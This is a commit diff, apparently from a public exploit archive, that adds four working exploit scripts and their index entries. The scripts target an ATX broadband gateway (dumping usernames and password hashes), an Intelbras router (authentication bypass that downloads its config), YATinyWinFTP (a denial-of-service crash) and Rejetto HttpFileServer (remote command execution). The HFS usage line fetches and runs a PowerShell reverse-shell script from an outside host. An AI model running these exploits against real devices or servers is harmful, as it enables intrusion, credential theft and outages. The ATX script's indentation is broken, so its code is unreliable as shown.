DB: 2020-12-01

4 changes to exploits/shellcodes YATinyWinFTP - Denial of Service (PoC) ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) Intelbras Router RF 301K 1.1.2 - Authentication Bypass
2020-12-01 05:01:56 +00:00 · 2020-12-01 05:01:56 +00:00 · 216721f32c
commit 216721f32c
parent 673a45a464
5 changed files with 150 additions and 0 deletions
--- a/exploits/hardware/webapps/49124.py
+++ b/exploits/hardware/webapps/49124.py
@ -0,0 +1,45 @@
+# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
+# Date: 2020-11-20
+# Exploit Author: Zagros Bingol
+# Vendor Homepage: http://www.atx.com
+# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
+# Version: 2.0 and earlier
+# Tested on: Debian 10 64bit
+
+-------------------------------------
+
+Endpoint:
+http://www.ip/domain.com/inc/user.ini
+
+--------------------------------------
+
+Proof-of-Concept:
+
+#!/usr/bin/python3
+#License: GNU General Public license v3.0
+#Author: Zagros Bingol(Zagrosbingol@outlook.com)
+
+
+import requests
+import re
+
+target = input("Target(ex:http://host): \n")
+port = input("Port: \n")
+
+
+def sploit(target, port):
+print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
+Credential Disclosure\n")
+r = requests.post(target + ":" + port + '/inc/user.ini')
+searching = re.findall(r"\[.{1,8}\]", str(r.text))
+print("Usernames:\n")
+print(", ".join(searching).replace("[", "").replace("]", ""))
+
+def hash():
+r = requests.post(target + '/inc/user.ini')
+searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
+print("Hashes:\n")
+print(", ".join(searching).replace("[", "").replace("]", ""))
+hash()
+
+sploit(target, port)
--- a/exploits/hardware/webapps/49126.py
+++ b/exploits/hardware/webapps/49126.py
@ -0,0 +1,37 @@
+# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass
+# Date: 27/11/2020
+# Exploit Author: Kaio Amaral
+# Vendor Homepage: https://www.intelbras.com/pt-br/
+# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip
+# Version: firmware version 1.1.2
+# Tested on: kali, android
+
+# POC
+
+# 1. nc host port, ex: nc 10.0.0.1 80
+# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0
+
+# Python3
+
+import socket
+from time import sleep
+
+def exploit(host, port=80):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode()
+    s.connect((host, port))
+    s.send(pay)
+    sleep(0.2)
+    data = s.recv(17576)
+    if len(data) > 1000:
+        print("[+] Success.")
+        return data.decode()
+    print("[-] Failed. ")
+    exit()
+
+def file(data):
+    with open("router.cfg", "w") as file:
+        file.write(data[233:])
+    print("[+] File Successfully Written.")
+
+file(exploit("10.0.0.1"))
--- a/exploits/windows/remote/49127.py
+++ b/exploits/windows/remote/49127.py
@ -0,0 +1,35 @@
+# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
+# Google Dork: None
+# Date: 20.08.2020
+# Exploit Author: strider
+# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
+# Software Link: https://github.com/ik80/YATinyWinFTP
+# Tested on: Windows 10
+
+------------------------------[Description]---------------------------------
+
+This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
+The result it crashes
+
+ -----------------------------[Exploit]---------------------------------------------
+
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import socket, sys
+
+target = (sys.argv[1], int(sys.argv[2]))
+buffer = b'A' * 272 + b'\x20'
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(target)
+print(s.recv(1024))
+s.send(buffer)
+s.close()
+
+ -----------------------------[how to run]-----------------------------
+
+C:\> TinyWinFTP.exe servepath port
+
+~$ python3 exploit.py targetip port
+
+Boom!
--- a/exploits/windows/webapps/49125.py
+++ b/exploits/windows/webapps/49125.py
@ -0,0 +1,29 @@
+# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 28-11-2020
+# Remote: Yes
+# Exploit Author: Óscar Andreu
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Windows Server 2008 , Windows 8, Windows 7
+# CVE : CVE-2014-6287
+
+#!/usr/bin/python3
+
+# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
+# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
+
+import urllib3
+import sys
+import urllib.parse
+
+try:
+	http = urllib3.PoolManager()	
+	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
+	print(url)
+	response = http.request('GET', url)
+	
+except Exception as ex:
+	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
+	print(ex)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18313,6 +18313,7 @@ id,file,description,date,author,type,platform,port
 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
 49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
+49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43345,3 +43346,6 @@ id,file,description,date,author,type,platform,port
 49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,
+49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,
+49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,
+49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,